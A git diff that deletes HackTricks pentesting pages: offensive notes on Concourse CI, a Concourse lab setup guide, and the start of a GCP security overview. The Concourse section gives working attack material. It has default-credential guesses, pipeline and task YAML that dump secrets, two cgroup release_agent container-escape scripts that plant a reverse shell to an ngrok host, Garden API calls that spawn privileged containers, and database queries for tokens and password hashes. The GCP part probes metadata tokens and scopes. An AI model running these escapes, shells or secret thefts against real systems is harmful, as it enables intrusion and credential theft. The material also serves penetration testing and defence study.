- -### Credential Management - -There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ -Moreover, Concourse supports different credential managers: - -* [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) -* [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) -* [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html) -* [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html) -* [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html) -* [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html) -* [Caching credentials](https://concourse-ci.org/creds-caching.html) -* [Redacting credentials](https://concourse-ci.org/creds-redacting.html) -* [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) - -{% hint style="danger" %} -Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. -{% endhint %} - -## Concourse Enumeration - -In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file. 
- -### Login and Current User enum - -* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: - * `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` -* Get configured **targets**: - * `fly targets` -* Get if the configured **target connection** is still **valid**: - * `fly -t status` -* Get **role** of the user against the indicated target: - * `fly -t userinfo` - -### Teams & Users - -* Get a list of the Teams - * `fly -t teams` -* Get roles inside team - * `fly -t get-team -n ` -* Get a list of users - * `fly -t active-users` - -### Pipelines - -* **List** pipelines: - * `fly -t pipelines -a` -* **Get** pipeline yaml (**sensitive information** might be found in the definition): - * `fly -t get-pipeline -p ` -* Get all pipeline **config declared vars** - * `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` -* Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): - -```bash -rm /tmp/secrets.txt; -for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do - echo $pipename; - fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; - echo ""; -done -echo "" -echo "ALL SECRETS" -cat /tmp/secrets.txt | sort | uniq -rm /tmp/secrets.txt -``` - -### Containers & Workers - -* List **workers**: - * `fly -t workers` -* List **containers**: - * `fly -t containers` -* List **builds** (to see what is running): - * `fly -t builds` - -## Concourse Attacks - -### Credentials Brute-Force - -* admin:admin -* test:test - -### Secrets and params enumeration - -In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. 
The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them. - -### Session inside running or recently run container - -If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using: - -```bash -fly -t tutorial intercept --job pipeline-name/job-name -fly -t tutorial intercept # To be presented a prompt with all the options -``` - -With these permissions you might be able to: - -* **Steal the secrets** inside the **container** -* Try to **escape** to the node -* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) - -### Pipeline Creation/Modification - -If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example: - -```yaml -jobs: -- name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - echo "$SUPER_SECRET" - sleep 1000 - params: - SUPER_SECRET: ((super.secret)) -``` - -With the **modification/creation** of a new pipeline you will be able to: - -* **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) -* **Escape** to the **node** (by giving you enough privileges - `privileged: true`) -* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) -* **Delete** created pipeline - -### Execute Custom Task - -This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**): - -```yaml -# For more task_config options check https://concourse-ci.org/tasks.html -platform: linux 
-image_resource: - type: registry-image - source: - repository: ubuntu -run: - path: sh - args: - - -cx - - | - env - sleep 1000 -params: - SUPER_SECRET: ((super.secret)) -``` - -```bash -fly -t tutorial execute --privileged --config task_config.yml -``` - -### Escaping to the node from privileged task - -In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex". - -In the following PoC we are going to use the release\_agent to escape with some small modifications: - -```bash -# Mounts the RDMA cgroup controller and create a child cgroup -# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist" -# It's because your setup doesn't have the memory cgroup controller, try change memory to rdma to fix it -mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x - -# Enables cgroup notifications on release of the "x" cgroup -echo 1 > /tmp/cgrp/x/notify_on_release - - -# CHANGE ME -# The host path will look like the following, but you need to change it: -host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs" - -# The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command: -#/dev/vda1 on /scratch type ext4 (rw,relatime) -#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime) -#/dev/vda1 on /etc/hosts type ext4 (rw,relatime) -#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime) - -# Then next part I think is constant "hostpath-provisioner/default/" - -# For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed -# "concourse-work-dir" is constant -# "concourse-release" is the consourse prefix of the current 
concourse env (you need to find it from the API) -# "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number) - -# The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant -# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like: -# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028 -# the UID is the part we are looking for - -# Then the host_path is: -#host_path="/mnt//hostpath-provisioner/default/concourse-work-dir--worker-/overlays//rootfs" - -# Sets release_agent to /path/payload -echo "$host_path/cmd" > /tmp/cgrp/release_agent - - -#==================================== -#Reverse shell -echo '#!/bin/bash' > /cmd -echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd -chmod a+x /cmd -#==================================== -# Get output -echo '#!/bin/sh' > /cmd -echo "ps aux > $host_path/output" >> /cmd -chmod a+x /cmd -#==================================== - -# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup -sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" - -# Reads the output -cat /output -``` - -{% hint style="warning" %} -As you might have noticed this is just a [**regular release\_agent escape**](../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#privileged) just modifying the path of the cmd in the node -{% endhint %} - -### Escaping to the node from a Worker container - -A regular release\_agent escape with a minor modification is enough for this: - -```bash -mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x - -# Enables cgroup notifications on release of the "x" cgroup -echo 1 > /tmp/cgrp/x/notify_on_release -host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -n 1` -echo "$host_path/cmd" > /tmp/cgrp/release_agent - -#==================================== -#Reverse 
 shell -echo '#!/bin/bash' > /cmd -echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd -chmod a+x /cmd -#==================================== -# Get output -echo '#!/bin/sh' > /cmd -echo "ps aux > $host_path/output" >> /cmd -chmod a+x /cmd -#==================================== - -# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup -sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" - -# Reads the output -cat /output -``` - -### Escaping to the node from the Web container - -Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless). - -However, it stores **local credentials in clear text**: - -```bash -cat /concourse-auth/local-users -test:test - -env | grep -i local_user -CONCOURSE_MAIN_TEAM_LOCAL_USER=test -CONCOURSE_ADD_LOCAL_USER=test:test -``` - -You could use those credentials to **login against the web server** and **create a privileged container and escape to the node**. - -In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info): - -```bash -env | grep -i postg -CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238 -CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432 -CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432 -CONCOURSE_POSTGRES_USER=concourse -CONCOURSE_POSTGRES_DATABASE=concourse -CONCOURSE_POSTGRES_PASSWORD=concourse -[...]
 - -# Access the postgresql db -psql -h 10.107.191.238 -U concourse -d concourse -select * from password; #Find hashed passwords -select * from access_tokens; -select * from auth_code; -select * from client; -select * from refresh_token; -select * from teams; #Change the permissions of the users in the teams -select * from users; -``` - -### Abusing Garden Service - Not a real Attack - -{% hint style="warning" %} -These are just some interesting notes about the service, but because it's only listening on localhost, these notes won't present any impact we haven't already exploited before -{% endhint %} - -By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what it needs to execute** (download the image and run each task). This sounds pretty good for an attacker, but there are some nice protections: - -* It's just **exposed locally** (127.0.0.1) and I think when the worker authenticates against the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker. -* The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
 - -Concourse workers run with high container privileges: - -``` -Container Runtime: docker -Has Namespaces: - pid: true - user: false -AppArmor Profile: kernel -Capabilities: - BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read -Seccomp: disabled -``` - -However, techniques like **mounting** the /dev device of the node or release\_agent **won't work** (as the real device with the filesystem of the node isn't accessible, only a virtual one). We cannot access processes of the node, so escaping to the node without kernel exploits gets complicated. - -{% hint style="info" %} -In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**. -{% endhint %} - -Note that playing with concourse I noticed that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
- -#### Getting inside a running privileged container - -```bash -# Get current container -curl 127.0.0.1:7777/containers -{"Handles":["ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]} - -# Get container info -curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info -curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties - -# Execute a new process inside a container -# In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53 -wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' - -# OR instead of doing all of that, you could just get into the ns of the process of the privileged container -nsenter --target 76011 --mount --uts --ipc --net --pid -- sh -``` - -#### Creating a new privileged container - -You can very easily create a new container (just run a random UID) and execute something on it: - -```bash -curl -X POST http://127.0.0.1:7777/containers \ - -H 'Content-Type: application/json' \ - -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' - -# Wget will be stucked there as long as the process is being executed -wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 
20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' -``` - -However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers: - -``` -GET /containers HTTP/1.1. -Host: 127.0.0.1:7777. -User-Agent: Go-http-client/1.1. -Accept-Encoding: gzip. -. - -T 127.0.0.1:7777 -> 127.0.0.1:59722 [AP] #157 -HTTP/1.1 200 OK. -Content-Type: application/json. -Date: Thu, 17 Mar 2022 22:42:55 GMT. -Content-Length: 131. -. -{"Handles":["123ae8fc-47ed-4eab-6b2e-123458880690","ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]} - -T 127.0.0.1:59722 -> 127.0.0.1:7777 [AP] #159 -DELETE /containers/123ae8fc-47ed-4eab-6b2e-123458880690 HTTP/1.1. -Host: 127.0.0.1:7777. -User-Agent: Go-http-client/1.1. -Accept-Encoding: gzip. -``` - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/concourse/concourse-lab-creation.md b/cloud-security/concourse/concourse-lab-creation.md deleted file mode 100644 index 457d4850a..000000000 --- a/cloud-security/concourse/concourse-lab-creation.md +++ /dev/null @@ -1,183 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Testing Environment - -## Running Concourse - -### With Docker-Compose - -This docker-compose file simplifies the installation to do some tests with concourse: - -```bash -wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml -docker-compose up -d -``` - -You can download the command line `fly` for your OS from the web in `127.0.0.1:8080` - -### With Kubernetes (Recommended) - -You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart). - -```bash -brew install helm -helm repo add concourse https://concourse-charts.storage.googleapis.com/ -helm install concourse-release concourse/concourse -# concourse-release will be the prefix name for the concourse elements in k8s -# After the installation you will find the indications to connect to it in the console - -# If you need to delete it -helm delete concourse-release -``` - -After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets: - -```yaml -echo 'apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - name: read-secrets -rules: -- apiGroups: [""] - resources: ["secrets"] - verbs: ["get"] - ---- - -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: read-secrets-concourse -roleRef: - apiGroup: rbac.authorization.k8s.io - kind: ClusterRole - name: read-secrets -subjects: -- kind: ServiceAccount - name: concourse-release-web - namespace: default - ---- - -apiVersion: v1 -kind: Secret -metadata: - name: super - namespace: concourse-release-main -type: Opaque -data: - secret: MWYyZDFlMmU2N2Rm - -' | kubectl apply -f - -``` - -## Create Pipeline - -A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html). 
 - -## Steps - -Several different types of steps can be used: - -* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) -* the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) -* the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) -* the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) -* the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) -* the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel -* the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence -* the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values -* the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails - -Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step. - -Therefore, it's possible to indicate the type of container each step needs to be run in.
- -## Simple Pipeline Example - -```yaml -jobs: -- name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - sleep 1000 - echo "$SUPER_SECRET" - params: - SUPER_SECRET: ((super.secret)) -``` - -```bash -fly -t tutorial set-pipeline -p pipe-name -c hello-world.yml -# pipelines are paused when first created -fly -t tutorial unpause-pipeline -p pipe-name -# trigger the job and watch it run to completion -fly -t tutorial trigger-job --job pipe-name/simple --watch -# From another console -fly -t tutorial intercept --job pipe-name/simple -``` - -Check **127.0.0.1:8080** to see the pipeline flow. - -## Bash script with output/input pipeline - -It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**. - -## Triggers - -You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time: - -* Some time passes: [Time resource](https://github.com/concourse/time-resource/) -* On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) -* New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) -* Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) - -Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md deleted file mode 100644 index c93ac8df7..000000000 --- a/cloud-security/gcp-security/README.md +++ /dev/null @@ -1,540 +0,0 @@ -# GCP Security - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Security concepts - -### **Resource hierarchy** - -Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions. - -At a high level, it looks like this: - -``` -Organization ---> Folders - --> Projects - --> Resources -``` - -A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc. - -### **IAM Roles** - -There are **three types** of roles in IAM: - -* **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM. -* **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined\_roles). -* **Custom roles**, which provide granular access according to a user-specified list of permissions. - -There are thousands of permissions in GCP. In order to check if a role has a permissions you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it. 
- -**You can also** [**search here predefined roles**](https://cloud.google.com/iam/docs/understanding-roles#product\_specific\_documentation) **offered by each product.** - -**You can find a** [**list of all the granular permissions here**](https://cloud.google.com/iam/docs/custom-roles-permissions-support)**.** - -#### Basic roles - -| Name | Title | Permissions | -| ---------------- | ------ | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| **roles/viewer** | Viewer | Permissions for **read-only actions** that do not affect state, such as viewing (but not modifying) existing resources or data. | -| **roles/editor** | Editor | All **viewer permissions**, **plus** permissions for actions that modify state, such as changing existing resources. | -| **roles/owner** | Owner |

All Editor permissions and permissions for the following actions:

  • Manage roles and permissions for a project and all resources within the project.
  • Set up billing for a project.
| - -You can try the following command to specifically **enumerate roles assigned to your service account** project-wide in the current project: - -```bash -PROJECT=$(curl http://metadata.google.internal/computeMetadata/v1/project/project-id \ - -H "Metadata-Flavor: Google" -s) -ACCOUNT=$(curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email \ - -H "Metadata-Flavor: Google" -s) -gcloud projects get-iam-policy $PROJECT \ - --flatten="bindings[].members" \ - --format='table(bindings.role)' \ - --filter="bindings.members:$ACCOUNT" -``` - -Don't worry too much if you get denied access to the command above. It's still possible to work out what you can do simply by trying to do it. - -More generally, you can shorten the command to the following to get an idea of the **roles assigned project-wide to all members**. - -``` -gcloud projects get-iam-policy [PROJECT-ID] -``` - -Or to see the IAM policy [assigned to a single Compute Instance](https://cloud.google.com/sdk/gcloud/reference/compute/instances/get-iam-policy) you can try the following. - -``` -gcloud compute instances get-iam-policy [INSTANCE] --zone [ZONE] -``` - -### **Organization Policies** - -The IAM policies indicate the permissions principals have over resources via roles which are assigned granular permissions. Organization policies **restrict how those services can be used or which features are enabled or disabled**. This helps improve the least privilege of each resource in the GCP environment.
- -### **Terraform IAM Policies, Bindings and Memberships** - -As defined by terraform in [https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/google\_project\_iam) using terraform with GCP there are different ways to grant a principal access over a resource: - -* **Memberships**: You set **principals as members of roles** **without restrictions** over the role or the principals. You can put a user as a member of a role and then put a group as a member of the same role and also set those principals (user and group) as member of other roles. -* **Bindings**: Several **principals can be binded to a role**. Those **principals can still be binded or be members of other roles**. However, if a principal which isn’t binded to the role is set as **member of a binded role**, the next time the **binding is applied, the membership will disappear**. -* **Policies**: A policy is **authoritative**, it indicates roles and principals and then, **those principals cannot have more roles and those roles cannot have more principals** unless that policy is modified (not even in other policies, bindings or memberships). Therefore, when a role or principal is specified in policy all its privileges are **limited by that policy**. Obviously, this can be bypassed in case the principal is given the option to modify the policy or privilege escalation permissions (like create a new principal and bind him a new role). - -### **Service accounts** - -Virtual machine instances are usually **assigned a service account**. Every GCP project has a [default service account](https://cloud.google.com/compute/docs/access/service-accounts#default\_service\_account), and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. 
This service account **can be used by any user or application on the machine** to communicate with the Google APIs. You can run the following command to see what accounts are available to you: - -``` -gcloud auth list -``` - -**Default service accounts will look like** one of the following: - -``` -PROJECT_NUMBER-compute@developer.gserviceaccount.com -PROJECT_ID@appspot.gserviceaccount.com -``` - -A **custom service account** will look like this: - -``` -SERVICE_ACCOUNT_NAME@PROJECT_NAME.iam.gserviceaccount.com -``` - -If `gcloud auth list` returns **multiple** accounts **available**, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using `gcloud config set account [ACCOUNT]` while trying the various tasks in this blog. - -### **Access scopes** - -The **service account** on a GCP Compute Instance will **use** **OAuth** to communicate with the Google Cloud APIs. When [access scopes](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam) are used, the OAuth token that is generated for the instance will **have a** [**scope**](https://oauth.net/2/scope/) **limitation included**. This defines **what API endpoints it can authenticate to**. It does **NOT define the actual permissions**. - -When using a **custom service account**, Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#service\_account\_permissions) that access scopes are not used and to **rely totally on IAM**. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programatically. - -There are three options when setting an access scope on a VM instance: - -* Allow default access -* All full access to all cloud APIs -* Set access for each API - -You can see what **scopes** are **assigned** by **querying** the **metadata** URL. 
Here is an example from a VM with "default" access assigned: - -``` -$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes \ - -H 'Metadata-Flavor:Google' - -https://www.googleapis.com/auth/devstorage.read_only -https://www.googleapis.com/auth/logging.write -https://www.googleapis.com/auth/monitoring.write -https://www.googleapis.com/auth/servicecontrol -https://www.googleapis.com/auth/service.management.readonly -https://www.googleapis.com/auth/trace.append -``` - -The most interesting thing in the **default** **scope** is **`devstorage.read_only`**. This grants read access to all storage buckets in the project. This can be devastating, which of course is great for us as an attacker. - -Here is what you'll see from an instance with **no scope limitations**: - -``` -curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google' -https://www.googleapis.com/auth/cloud-platform -``` - -This `cloud-platform` scope is what we are really hoping for, as it will allow us to authenticate to any API function and leverage the full power of our assigned IAM permissions. - -It is possible to encounter some **conflicts** when using both **IAM and access scopes**. For example, your service account may have the IAM role of `compute.instanceAdmin` but the instance you've breached has been crippled with the scope limitation of `https://www.googleapis.com/auth/compute.readonly`. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance. - -### Default credentials - -**Default service account token** - -The **metadata server** available to a given instance will **provide** any user/process **on that instance** with an **OAuth token** that is automatically used as the **default credentials** when communicating with Google APIs via the `gcloud` command. 
